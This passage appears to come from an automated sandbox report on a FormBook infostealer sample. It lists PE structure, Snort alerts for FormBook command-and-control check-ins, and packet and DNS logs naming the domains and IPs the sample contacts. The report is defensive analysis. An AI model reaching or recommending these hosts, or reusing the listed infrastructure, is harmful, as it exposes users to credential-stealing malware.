                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xbe4740x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x10ee4.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000xbc4cc0xbc600False0.670309389516data7.21231975694IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xc00000x10ee40x11000False0.0654871323529data3.2668947264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0xd20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0xc01300x10828data
                                                                      RT_GROUP_ICON0xd09580x14data
                                                                      RT_VERSION0xd096c0x38cPGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                      RT_MANIFEST0xd0cf80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyrightCopyright 2011
                                                                      Assembly Version1.0.0.0
                                                                      InternalNameThreeElementAsyncLocalValueMap.exe
                                                                      FileVersion1.0.0.0
                                                                      CompanyName
                                                                      LegalTrademarks
                                                                      Comments
                                                                      ProductNameFileReplacement
                                                                      ProductVersion1.0.0.0
                                                                      FileDescriptionFileReplacement
                                                                      OriginalFilenameThreeElementAsyncLocalValueMap.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      01/13/21-21:40:06.887570TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.4104.18.45.60
                                                                      01/13/21-21:40:06.887570TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.4104.18.45.60
                                                                      01/13/21-21:40:06.887570TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.4104.18.45.60
                                                                      01/13/21-21:40:07.314032TCP1201ATTACK-RESPONSES 403 Forbidden8049762104.18.45.60192.168.2.4
                                                                      01/13/21-21:40:14.786267TCP1201ATTACK-RESPONSES 403 Forbidden804976834.102.136.180192.168.2.4
                                                                      01/13/21-21:40:56.048911TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.434.102.136.180
                                                                      01/13/21-21:40:56.048911TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.434.102.136.180
                                                                      01/13/21-21:40:56.048911TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.434.102.136.180
                                                                      01/13/21-21:40:56.187163TCP1201ATTACK-RESPONSES 403 Forbidden804977634.102.136.180192.168.2.4
                                                                      01/13/21-21:41:06.700106TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977780192.168.2.4192.185.0.218
                                                                      01/13/21-21:41:06.700106TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977780192.168.2.4192.185.0.218
                                                                      01/13/21-21:41:06.700106TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977780192.168.2.4192.185.0.218
                                                                      01/13/21-21:41:38.560393TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978080192.168.2.4198.54.117.244
                                                                      01/13/21-21:41:38.560393TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978080192.168.2.4198.54.117.244
                                                                      01/13/21-21:41:38.560393TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978080192.168.2.4198.54.117.244
                                                                      01/13/21-21:41:44.011374TCP1201ATTACK-RESPONSES 403 Forbidden804978134.102.136.180192.168.2.4
                                                                      01/13/21-21:41:54.395768TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.4104.18.45.60
                                                                      01/13/21-21:41:54.395768TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.4104.18.45.60
                                                                      01/13/21-21:41:54.395768TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.4104.18.45.60
                                                                      01/13/21-21:41:54.788088TCP1201ATTACK-RESPONSES 403 Forbidden8049783104.18.45.60192.168.2.4
                                                                      01/13/21-21:41:59.979944TCP1201ATTACK-RESPONSES 403 Forbidden804978434.102.136.180192.168.2.4

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 13, 2021 21:40:01.428497076 CET4975980192.168.2.452.116.52.25
                                                                      Jan 13, 2021 21:40:01.588248014 CET804975952.116.52.25192.168.2.4
                                                                      Jan 13, 2021 21:40:01.588378906 CET4975980192.168.2.452.116.52.25
                                                                      Jan 13, 2021 21:40:01.588515997 CET4975980192.168.2.452.116.52.25
                                                                      Jan 13, 2021 21:40:01.747723103 CET804975952.116.52.25192.168.2.4
                                                                      Jan 13, 2021 21:40:01.747785091 CET804975952.116.52.25192.168.2.4
                                                                      Jan 13, 2021 21:40:01.747821093 CET804975952.116.52.25192.168.2.4
                                                                      Jan 13, 2021 21:40:01.747997046 CET4975980192.168.2.452.116.52.25
                                                                      Jan 13, 2021 21:40:01.750302076 CET4975980192.168.2.452.116.52.25
                                                                      Jan 13, 2021 21:40:01.909440041 CET804975952.116.52.25192.168.2.4
                                                                      Jan 13, 2021 21:40:06.837146997 CET4976280192.168.2.4104.18.45.60
                                                                      Jan 13, 2021 21:40:06.887345076 CET8049762104.18.45.60192.168.2.4
                                                                      Jan 13, 2021 21:40:06.887456894 CET4976280192.168.2.4104.18.45.60
                                                                      Jan 13, 2021 21:40:06.887569904 CET4976280192.168.2.4104.18.45.60
                                                                      Jan 13, 2021 21:40:06.937866926 CET8049762104.18.45.60192.168.2.4
                                                                      Jan 13, 2021 21:40:07.314032078 CET8049762104.18.45.60192.168.2.4
                                                                      Jan 13, 2021 21:40:07.314054966 CET8049762104.18.45.60192.168.2.4
                                                                      Jan 13, 2021 21:40:07.314274073 CET4976280192.168.2.4104.18.45.60
                                                                      Jan 13, 2021 21:40:07.314368963 CET4976280192.168.2.4104.18.45.60
                                                                      Jan 13, 2021 21:40:07.314476967 CET8049762104.18.45.60192.168.2.4
                                                                      Jan 13, 2021 21:40:07.314594030 CET4976280192.168.2.4104.18.45.60
                                                                      Jan 13, 2021 21:40:12.394632101 CET4976880192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:12.435339928 CET804976834.102.136.180192.168.2.4
                                                                      Jan 13, 2021 21:40:12.435442924 CET4976880192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:12.435581923 CET4976880192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:12.515372992 CET804976834.102.136.180192.168.2.4
                                                                      Jan 13, 2021 21:40:12.945112944 CET4976880192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:13.257524967 CET4976880192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:13.867010117 CET4976880192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:14.786267042 CET804976834.102.136.180192.168.2.4
                                                                      Jan 13, 2021 21:40:14.786432028 CET4976880192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:14.826644897 CET804976834.102.136.180192.168.2.4
                                                                      Jan 13, 2021 21:40:14.826752901 CET4976880192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:18.146260977 CET4977080192.168.2.466.96.147.112
                                                                      Jan 13, 2021 21:40:18.267848015 CET804977066.96.147.112192.168.2.4
                                                                      Jan 13, 2021 21:40:18.268002033 CET4977080192.168.2.466.96.147.112
                                                                      Jan 13, 2021 21:40:18.268443108 CET4977080192.168.2.466.96.147.112
                                                                      Jan 13, 2021 21:40:18.390229940 CET804977066.96.147.112192.168.2.4
                                                                      Jan 13, 2021 21:40:18.403419018 CET804977066.96.147.112192.168.2.4
                                                                      Jan 13, 2021 21:40:18.403451920 CET804977066.96.147.112192.168.2.4
                                                                      Jan 13, 2021 21:40:18.403599977 CET4977080192.168.2.466.96.147.112
                                                                      Jan 13, 2021 21:40:18.403798103 CET4977080192.168.2.466.96.147.112
                                                                      Jan 13, 2021 21:40:18.525497913 CET804977066.96.147.112192.168.2.4
                                                                      Jan 13, 2021 21:40:28.577955008 CET4977180192.168.2.4107.180.50.162
                                                                      Jan 13, 2021 21:40:28.708549976 CET8049771107.180.50.162192.168.2.4
                                                                      Jan 13, 2021 21:40:28.708681107 CET4977180192.168.2.4107.180.50.162
                                                                      Jan 13, 2021 21:40:28.708831072 CET4977180192.168.2.4107.180.50.162
                                                                      Jan 13, 2021 21:40:28.838772058 CET8049771107.180.50.162192.168.2.4
                                                                      Jan 13, 2021 21:40:28.856754065 CET8049771107.180.50.162192.168.2.4
                                                                      Jan 13, 2021 21:40:28.856844902 CET8049771107.180.50.162192.168.2.4
                                                                      Jan 13, 2021 21:40:28.857040882 CET4977180192.168.2.4107.180.50.162
                                                                      Jan 13, 2021 21:40:28.857084036 CET4977180192.168.2.4107.180.50.162
                                                                      Jan 13, 2021 21:40:28.987709999 CET8049771107.180.50.162192.168.2.4
                                                                      Jan 13, 2021 21:40:33.971158028 CET4977280192.168.2.4104.21.26.55
                                                                      Jan 13, 2021 21:40:34.011370897 CET8049772104.21.26.55192.168.2.4
                                                                      Jan 13, 2021 21:40:34.011513948 CET4977280192.168.2.4104.21.26.55
                                                                      Jan 13, 2021 21:40:34.011687994 CET4977280192.168.2.4104.21.26.55
                                                                      Jan 13, 2021 21:40:34.051744938 CET8049772104.21.26.55192.168.2.4
                                                                      Jan 13, 2021 21:40:34.063383102 CET8049772104.21.26.55192.168.2.4
                                                                      Jan 13, 2021 21:40:34.063654900 CET4977280192.168.2.4104.21.26.55
                                                                      Jan 13, 2021 21:40:34.063942909 CET8049772104.21.26.55192.168.2.4
                                                                      Jan 13, 2021 21:40:34.064101934 CET4977280192.168.2.4104.21.26.55
                                                                      Jan 13, 2021 21:40:34.104882002 CET8049772104.21.26.55192.168.2.4
                                                                      Jan 13, 2021 21:40:39.168009996 CET4977380192.168.2.45.181.218.55
                                                                      Jan 13, 2021 21:40:39.319611073 CET80497735.181.218.55192.168.2.4
                                                                      Jan 13, 2021 21:40:39.319725990 CET4977380192.168.2.45.181.218.55
                                                                      Jan 13, 2021 21:40:39.319844007 CET4977380192.168.2.45.181.218.55
                                                                      Jan 13, 2021 21:40:39.470227957 CET80497735.181.218.55192.168.2.4
                                                                      Jan 13, 2021 21:40:39.806788921 CET4977380192.168.2.45.181.218.55
                                                                      Jan 13, 2021 21:40:39.995102882 CET80497735.181.218.55192.168.2.4
                                                                      Jan 13, 2021 21:40:40.836158037 CET80497735.181.218.55192.168.2.4
                                                                      Jan 13, 2021 21:40:40.836997032 CET80497735.181.218.55192.168.2.4
                                                                      Jan 13, 2021 21:40:40.837148905 CET4977380192.168.2.45.181.218.55
                                                                      Jan 13, 2021 21:40:40.838443995 CET4977380192.168.2.45.181.218.55
                                                                      Jan 13, 2021 21:40:50.229949951 CET4977580192.168.2.4219.94.203.152
                                                                      Jan 13, 2021 21:40:50.540981054 CET8049775219.94.203.152192.168.2.4
                                                                      Jan 13, 2021 21:40:50.541208982 CET4977580192.168.2.4219.94.203.152
                                                                      Jan 13, 2021 21:40:50.541443110 CET4977580192.168.2.4219.94.203.152
                                                                      Jan 13, 2021 21:40:50.852966070 CET8049775219.94.203.152192.168.2.4
                                                                      Jan 13, 2021 21:40:50.922324896 CET8049775219.94.203.152192.168.2.4
                                                                      Jan 13, 2021 21:40:50.922343016 CET8049775219.94.203.152192.168.2.4
                                                                      Jan 13, 2021 21:40:50.922624111 CET4977580192.168.2.4219.94.203.152
                                                                      Jan 13, 2021 21:40:50.922776937 CET4977580192.168.2.4219.94.203.152
                                                                      Jan 13, 2021 21:40:51.233577013 CET8049775219.94.203.152192.168.2.4
                                                                      Jan 13, 2021 21:40:56.005146027 CET4977680192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:56.045151949 CET804977634.102.136.180192.168.2.4
                                                                      Jan 13, 2021 21:40:56.048319101 CET4977680192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:56.048911095 CET4977680192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:56.088887930 CET804977634.102.136.180192.168.2.4
                                                                      Jan 13, 2021 21:40:56.187163115 CET804977634.102.136.180192.168.2.4
                                                                      Jan 13, 2021 21:40:56.187185049 CET804977634.102.136.180192.168.2.4
                                                                      Jan 13, 2021 21:40:56.187419891 CET4977680192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:56.187513113 CET4977680192.168.2.434.102.136.180
                                                                      Jan 13, 2021 21:40:56.229310989 CET804977634.102.136.180192.168.2.4
                                                                      Jan 13, 2021 21:41:06.535482883 CET4977780192.168.2.4192.185.0.218
                                                                      Jan 13, 2021 21:41:06.693619013 CET8049777192.185.0.218192.168.2.4
                                                                      Jan 13, 2021 21:41:06.696706057 CET4977780192.168.2.4192.185.0.218
                                                                      Jan 13, 2021 21:41:06.700105906 CET4977780192.168.2.4192.185.0.218
                                                                      Jan 13, 2021 21:41:06.857822895 CET8049777192.185.0.218192.168.2.4
                                                                      Jan 13, 2021 21:41:06.857851028 CET8049777192.185.0.218192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 13, 2021 21:39:03.769582033 CET6454953192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:03.817517996 CET53645498.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:04.687351942 CET6315353192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:04.737185001 CET53631538.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:08.918391943 CET5299153192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:08.966140032 CET53529918.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:10.078830004 CET5370053192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:10.126689911 CET53537008.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:10.883361101 CET5172653192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:10.931302071 CET53517268.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:11.792531013 CET5679453192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:11.840539932 CET53567948.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:13.050211906 CET5653453192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:13.098164082 CET53565348.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:13.837110996 CET5662753192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:13.888046980 CET53566278.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:14.646430969 CET5662153192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:14.697665930 CET53566218.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:15.817425013 CET6311653192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:15.866247892 CET53631168.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:17.008371115 CET6407853192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:17.059150934 CET53640788.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:30.234755039 CET6480153192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:30.282686949 CET53648018.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:35.357418060 CET6172153192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:35.415160894 CET53617218.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:51.866336107 CET5125553192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:51.917222023 CET53512558.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:55.072583914 CET6152253192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:55.123357058 CET53615228.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:56.169661999 CET5233753192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:56.217612982 CET53523378.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:56.834964991 CET5504653192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:56.882890940 CET53550468.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:57.297414064 CET4961253192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:57.353503942 CET53496128.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:57.726777077 CET4928553192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:57.791210890 CET53492858.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:57.827044010 CET5060153192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:57.886919022 CET53506018.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:58.426337957 CET6087553192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:58.485651970 CET53608758.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:59.031951904 CET5644853192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:59.088660002 CET53564488.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:39:59.816644907 CET5917253192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:39:59.867450953 CET53591728.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:01.356472969 CET6242053192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:01.423151970 CET53624208.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:01.541433096 CET6057953192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:01.597776890 CET53605798.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:02.943430901 CET5018353192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:03.000041962 CET53501838.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:06.760885954 CET6153153192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:06.836218119 CET53615318.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:08.267771006 CET4922853192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:08.326929092 CET53492288.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:12.326385975 CET5979453192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:12.393527031 CET53597948.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:15.465415001 CET5591653192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:15.513267994 CET53559168.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:17.996078014 CET5275253192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:18.143990993 CET53527528.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:23.419203997 CET6054253192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:23.496516943 CET53605428.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:28.514401913 CET6068953192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:28.576649904 CET53606898.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:33.897445917 CET6420653192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:33.970165014 CET53642068.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:39.076437950 CET5090453192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:39.113449097 CET5752553192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:39.161427975 CET53575258.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:39.167140961 CET53509048.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:44.826822996 CET5381453192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:44.894416094 CET53538148.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:49.927184105 CET5341853192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:50.228456974 CET53534188.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:40:55.942719936 CET6283353192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:40:56.002938032 CET53628338.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:41:06.247328997 CET5926053192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:41:06.533694983 CET53592608.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:41:11.887011051 CET4994453192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:41:12.040739059 CET53499448.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:41:37.266710997 CET6330053192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:41:37.322856903 CET53633008.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:41:38.135998011 CET6144953192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:41:38.364562988 CET53614498.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:41:43.769854069 CET5127553192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:41:43.830523014 CET53512758.8.8.8192.168.2.4
                                                                      Jan 13, 2021 21:42:10.255633116 CET6349253192.168.2.48.8.8.8
                                                                      Jan 13, 2021 21:42:10.354531050 CET53634928.8.8.8192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jan 13, 2021 21:40:01.356472969 CET192.168.2.48.8.8.80xcf09Standard query (0)www.bimetalthermostatksd.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:06.760885954 CET192.168.2.48.8.8.80x8e2dStandard query (0)www.straightlineautoserviceerie.netA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:12.326385975 CET192.168.2.48.8.8.80x78bbStandard query (0)www.cmoorestudio.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:15.465415001 CET192.168.2.48.8.8.80x756fStandard query (0)g.msn.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:17.996078014 CET192.168.2.48.8.8.80xb270Standard query (0)www.eldritchparadox.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:23.419203997 CET192.168.2.48.8.8.80x6e0dStandard query (0)www.nipseythegreat.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:28.514401913 CET192.168.2.48.8.8.80x51fbStandard query (0)www.maconanimalexterminator.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:33.897445917 CET192.168.2.48.8.8.80xa2d3Standard query (0)www.pelisplusxd.netA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:39.076437950 CET192.168.2.48.8.8.80xfb5aStandard query (0)www.allismd.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:44.826822996 CET192.168.2.48.8.8.80x106Standard query (0)www.qoo10online.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:49.927184105 CET192.168.2.48.8.8.80xe769Standard query (0)www.central-car-sales.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:55.942719936 CET192.168.2.48.8.8.80x45d7Standard query (0)www.nolarapper.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:06.247328997 CET192.168.2.48.8.8.80xc240Standard query (0)www.promanconsortium.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:11.887011051 CET192.168.2.48.8.8.80x87e8Standard query (0)www.animaliaartist.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:37.266710997 CET192.168.2.48.8.8.80x3889Standard query (0)www.animaliaartist.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:38.135998011 CET192.168.2.48.8.8.80x337eStandard query (0)www.profille-sarina23tammara.clubA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:43.769854069 CET192.168.2.48.8.8.80xd6f9Standard query (0)www.restaurantsilhouette.comA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:42:10.255633116 CET192.168.2.48.8.8.80x6234Standard query (0)www.nipseythegreat.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jan 13, 2021 21:40:01.423151970 CET8.8.8.8192.168.2.40xcf09No error (0)www.bimetalthermostatksd.com52.116.52.25A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:06.836218119 CET8.8.8.8192.168.2.40x8e2dNo error (0)www.straightlineautoserviceerie.net104.18.45.60A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:06.836218119 CET8.8.8.8192.168.2.40x8e2dNo error (0)www.straightlineautoserviceerie.net104.18.44.60A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:06.836218119 CET8.8.8.8192.168.2.40x8e2dNo error (0)www.straightlineautoserviceerie.net172.67.210.21A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:12.393527031 CET8.8.8.8192.168.2.40x78bbNo error (0)www.cmoorestudio.comcmoorestudio.comCNAME (Canonical name)IN (0x0001)
                                                                      Jan 13, 2021 21:40:12.393527031 CET8.8.8.8192.168.2.40x78bbNo error (0)cmoorestudio.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:15.513267994 CET8.8.8.8192.168.2.40x756fNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                      Jan 13, 2021 21:40:18.143990993 CET8.8.8.8192.168.2.40xb270No error (0)www.eldritchparadox.com66.96.147.112A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:23.496516943 CET8.8.8.8192.168.2.40x6e0dName error (3)www.nipseythegreat.comnonenoneA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:28.576649904 CET8.8.8.8192.168.2.40x51fbNo error (0)www.maconanimalexterminator.commaconanimalexterminator.comCNAME (Canonical name)IN (0x0001)
                                                                      Jan 13, 2021 21:40:28.576649904 CET8.8.8.8192.168.2.40x51fbNo error (0)maconanimalexterminator.com107.180.50.162A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:33.970165014 CET8.8.8.8192.168.2.40xa2d3No error (0)www.pelisplusxd.net104.21.26.55A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:33.970165014 CET8.8.8.8192.168.2.40xa2d3No error (0)www.pelisplusxd.net172.67.135.124A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:39.167140961 CET8.8.8.8192.168.2.40xfb5aNo error (0)www.allismd.comallismd.comCNAME (Canonical name)IN (0x0001)
                                                                      Jan 13, 2021 21:40:39.167140961 CET8.8.8.8192.168.2.40xfb5aNo error (0)allismd.com5.181.218.55A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:44.894416094 CET8.8.8.8192.168.2.40x106Name error (3)www.qoo10online.comnonenoneA (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:50.228456974 CET8.8.8.8192.168.2.40xe769No error (0)www.central-car-sales.com219.94.203.152A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:40:56.002938032 CET8.8.8.8192.168.2.40x45d7No error (0)www.nolarapper.comnolarapper.comCNAME (Canonical name)IN (0x0001)
                                                                      Jan 13, 2021 21:40:56.002938032 CET8.8.8.8192.168.2.40x45d7No error (0)nolarapper.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:06.533694983 CET8.8.8.8192.168.2.40xc240No error (0)www.promanconsortium.com192.185.0.218A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:12.040739059 CET8.8.8.8192.168.2.40x87e8No error (0)www.animaliaartist.comanimaliaartist.comCNAME (Canonical name)IN (0x0001)
                                                                      Jan 13, 2021 21:41:12.040739059 CET8.8.8.8192.168.2.40x87e8No error (0)animaliaartist.com67.205.105.239A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:37.322856903 CET8.8.8.8192.168.2.40x3889No error (0)www.animaliaartist.comanimaliaartist.comCNAME (Canonical name)IN (0x0001)
